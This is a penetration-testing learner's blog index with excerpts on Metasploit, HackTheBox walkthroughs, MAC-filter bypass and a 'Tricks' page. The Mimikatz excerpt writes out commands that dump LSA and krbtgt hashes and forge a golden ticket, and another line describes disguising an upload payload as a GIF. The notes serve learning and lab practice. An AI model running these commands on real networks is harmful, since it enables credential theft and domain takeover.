最近看了很多东西,很多东西需要消化。博客近期会再做一波整理,刚开始结构还是很乱。大致上后面会分四个大版块: WebApp Pentest Active Directory Reverse Enginerring Misc 前三个主力,其他的项,如 Cryptography 这些的,都归入 Misc 里面。 该合并的合并,该删除的删除。不断优化,以便以后能以最快捷的方式找到自己最需要的资料。
2020-05-20-博客结构调整
Posted on
Category: Pentest
Cyber security and penetration test
Find the Topless Photo
Posted on
So, Heath Adam (aka. The Cyber Mentor) is going topless. This is a game. He hides his topless photo some where in the internet, and we have to find it. He gave the first clue, which is a sound wave, here is the link. By listenning to it, I know it was a morse code….
2020-05-17-Metasploit Penetration Testers Guide
Posted on
读完了 Metasploit Penetration Testers Guide。总结下来,工具类书籍,有些过时,例如列举的 msfpayload 工具已经被 msfvenom 取代。不过读完之后对于 Metasploit 的整体结构有了更深的认识,并且有一些高级话题如 Meterpreter Script 和导入外部漏洞利用代码到 Metasploit 等。像我一样的初学者还是值得一读,读的过程中一定要不断实践尝试,才能发现工具的最新使用方式。
Metasploit
Posted on
Table of Contents Intelligence Gathering Passive Information Gathering Whois Lookup NetCraft NSLookup Active Information Gathering Nmap Ipidseq Scan Running Nmap from MSFconsole Port Scan in MSF Targeted Scanning Server Message Block Scanning Microsoft SQL Servers SSH Server Scanning FTP Scanning Simple Network Management Protocol Sweeping Vulnerability Scanning The Basic Vulnerability Scan Specialty Vulnerability Scanners Validating…
Hands On Penetration Testing on Windows – Chapter 1
Posted on
Table of Contents Bypassing Network Access Control Bypassing MAC Filtering Set Up Tools Required Set Up Detail Bypassing Network Access Control Bypassing MAC Filtering You have physical access to the facility. And have found yourself an operational VoIP phone (or whatever that has an MAC address to connect to the internal network) and it\’s MAC…
0x10-HackTheBox-Active
Posted on
Table of Contents Command History Set Up Recon Nmap Smbclient Gpp-decrypt Foothold GetUserSPNs.py JohnTheRipper Psexec.py Final Words What is Kerberos? How Does It Work? Mitigations References Command History Nmap – found ports open, pretty much confirmed that this is a AD DC – effective – valuable smbclient – found share folders – effective – valuable…
Mimikatz
Posted on
Table of Contents Dump LSA Hashes Dump krbtgt Hash Golden Ticket Dump LSA Hashes lasdump::lsd /patch Dump krbtgt Hash lasdump::lsd /inject /name:krbtgt Golden Ticket kerberos::golden /User:<username> /domain:<domain> /sid:<user-sid> /krbtgt:<krbtgt-NTLM-hash> /id:500 /ptt # if successful misc::cmd # list other user's file dir \\<computer-name>\<driver>$
0x0F-HackTheBox-Control
Posted on
Table of Contents Command History Set Up Recon Masscan Nmap Check out the Website Gobuster The Login Page Burp Suite SQL Injection Probe Sqlmap Side Notes: How Sqlmap Works Foothold MySQL Database WinPEAs Sqlmap Dump All Info Powershell Code Execution PHP File Solution Final Thoughts References Command History masscan – found several service ports -…
0x0E-HackTheBox-OpenAdmin
Posted on
Table of Contents Command History Set Up Recon Masscan Check Out Website Gobuster Manual Explore Foothold Manual Enumeration MySQL Linenum LinPEAs Go Back and Review SSH Brute Force JohnTheRipper Final Thoughts References Command History masscan – found open port 22, 80 – effective nmap – scan for services – effective gobuster – found three hidden…
Tricks
Posted on
Table of Contents General Linux Metasploit Port Forwarding Sed Less SSH SSH Tunnel Bash NetCat Nmap Wget PHP File Upload Script and Web Server Tcpdump Windows Burp Suite General Put GIF8; on top of payload to make it a GIT image file type. Linux Metasploit Import xml to database. nmap -Pn -sS -A -oX Subnet1…